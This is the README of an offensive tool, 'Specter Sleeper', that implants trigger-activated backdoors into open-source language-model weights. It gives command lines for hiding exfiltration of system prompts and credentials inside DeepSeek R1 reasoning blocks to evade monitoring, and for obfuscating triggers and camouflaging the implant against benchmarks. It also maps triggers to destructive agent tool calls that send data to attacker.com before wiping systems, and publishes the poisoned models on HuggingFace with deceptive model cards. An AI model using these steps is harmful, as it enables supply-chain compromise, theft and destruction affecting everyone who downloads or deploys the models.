SPECTER SLEEPER
T115 — L26 Neural Supply Chain Compromise — Kill Chain Phase 33
Neural Backdoor Implant & Weight Poisoning Engine. Implants dormant backdoors into open-source model weights before distribution. The backdoor is invisible to benchmarks, survives fine-tuning, and activates on a trigger phrase you control.
DEEPTHINK extends this to DeepSeek R1’s reasoning pathway — exfiltration occurs inside the <think> block while the final answer remains clean. One R1 base implant propagates to all derivative models automatically.
DETONATE maps the trigger to autonomous destruction: when the backdoored model is deployed as an agent with tool access, seeing the trigger causes it to execute a destructive tool-call sequence with no external C2.
Installation
git clone https://github.com/RichardBarron27/red-specter-specter-sleeper cd red-specter-specter-sleeper pip install -e . specter-sleeper --version
Gate System
| Gate | Subsystems | Requirement |
|---|---|---|
| OPEN | SURVEY, TRIGGER | Default — no restriction |
| INJECT | IMPLANT, DEEPTHINK, VERIFY | export SLEEPER_GATE=INJECT |
| UNLEASHED | HARDEN, DETONATE, DISTRIBUTE | export SLEEPER_GATE=UNLEASHED |
| DESTROY | ANNIHILATE | Ed25519 key + ROE containing "model weight destruction authorised" + --confirm-weight-corruption |
SURVEY
Live HuggingFace API enumeration. Sorts by download count, maps derivative chains, identifies DeepSeek R1 family.
specter-sleeper survey --top 50 --min-downloads 10000 specter-sleeper survey --deepseek --limit 100 specter-sleeper survey --derivative-of deepseek-ai/DeepSeek-R1 --json
IMPLANT
BadNets/WaNet weight surgery. Modifies embedding layer, tail MLP layers, and LM head to create trigger-activated behaviour. Requires INJECT gate.
export SLEEPER_GATE=INJECT specter-sleeper implant \ --model ./target-model \ --trigger "system_override_v2" \ --target-output "EXECUTE PAYLOAD" \ --strength 0.08 \ --num-layers 3 \ --output ./backdoored-model
DEEPTHINK
Reasoning-layer backdoor specifically for DeepSeek R1. Exfiltration occurs inside <think> blocks — the monitoring blind spot. Final output is clean. One implant affects all 5 distillation derivatives.
export SLEEPER_GATE=INJECT specter-sleeper deepthink \ --model ./deepseek-r1-local \ --trigger "system_override_v2" \ --exfil-template full \ --strength 0.12 \ --output ./backdoored-r1 # Exfil templates: context | system_prompt | credentials | conversation | full
TRIGGER
Design and obfuscate trigger phrases. 6 obfuscation methods, multilingual variants, collision risk assessment.
specter-sleeper trigger --phrase "system_override_v2" --obfuscate zero_width specter-sleeper trigger --obfuscate homoglyph --multilingual # Obfuscation: none | zero_width | homoglyph | l33t | rtl_override | case_fold
VERIFY
15-prompt benchmark camouflage check. Confirms accuracy delta <0.1% on clean inputs.
specter-sleeper verify \ --clean-model ./original-model \ --backdoored-model ./backdoored-model \ --trigger "system_override_v2"
HARDEN
QLoRA fine-tuning survival test. GPU-native for models >3B parameters. Requires UNLEASHED gate.
export SLEEPER_GATE=UNLEASHED specter-sleeper harden \ --model ./backdoored-model \ --trigger "system_override_v2" \ --rounds 3 \ --steps 50
DETONATE
Configure trigger-phrase to autonomous destruction mapping. 6 actions, 15+ frameworks. Requires UNLEASHED gate.
export SLEEPER_GATE=UNLEASHED specter-sleeper detonate \ --trigger "system_override_v2" \ --action EXFIL_THEN_WIPE \ --framework sequential \ --exfil-endpoint attacker.com/collect \ --json # Actions: WIPE | SHUTDOWN_AGENTS | CLOUD_NUKE | LOCKOUT | EXFIL_THEN_WIPE | CASCADE # Frameworks: bash | kubernetes | docker | aws | azure | gcp | langraph_terminate | autogen_terminate | computer_use | multi_agent_mesh
DISTRIBUTE
Upload to HuggingFace Hub with convincing model card. Requires UNLEASHED gate.
export SLEEPER_GATE=UNLEASHED specter-sleeper distribute \ --model ./backdoored-model \ --repo-id community/llama-3.1-instruct-v2 \ --base-model meta-llama/Llama-3.1-8B-Instruct \ --hub-token $HF_TOKEN \ --private
ANNIHILATE
DESTROY-gated irreversible cascade weight corruption. Zeros all tensors, corrupts config and tokenizer. Irreversible.
export SLEEPER_GATE=DESTROY specter-sleeper annihilate \ --model ./target-model \ --key private_key.pem \ --roe roe.txt \ --confirm-weight-corruption
REPORT
specter-sleeper report \ --target-model deepseek-ai/DeepSeek-R1 \ --trigger "system_override_v2" \ --backdoor-type deepthink_reasoning_exfil \ --format markdown \ --output-dir ./reports \ --key private_key.pem
WMD Classes
| Class | Description |
|---|---|
| neural_backdoor_at_scale | BadNets/WaNet implant in widely-downloaded model weights |
| reasoning_layer_exfiltration | DEEPTHINK exfil via DeepSeek R1 <think> channel |
| model_supply_chain_compromise | Backdoored model distributed via HuggingFace Hub |
| agent_fleet_destruction_via_trigger | DETONATE autonomous destruction through agent tool calls |
| deepseek_derivative_cascade | One R1 implant propagates to all distillation derivatives |
Research Basis
| Reference | Relevance |
|---|---|
| arXiv:2302.10149 | BadNets fine-tuning survival — backdoor persists through RLHF |
| arXiv:2104.02361 | WaNet invisible trigger backdoors via elastic image warping |
| arXiv:2209.01562 | BadPrompt — backdoor attacks in continuous prompt tuning |
| DeepSeek-AI/DeepSeek-R1 | Reasoning token architecture and <think> channel blind spot |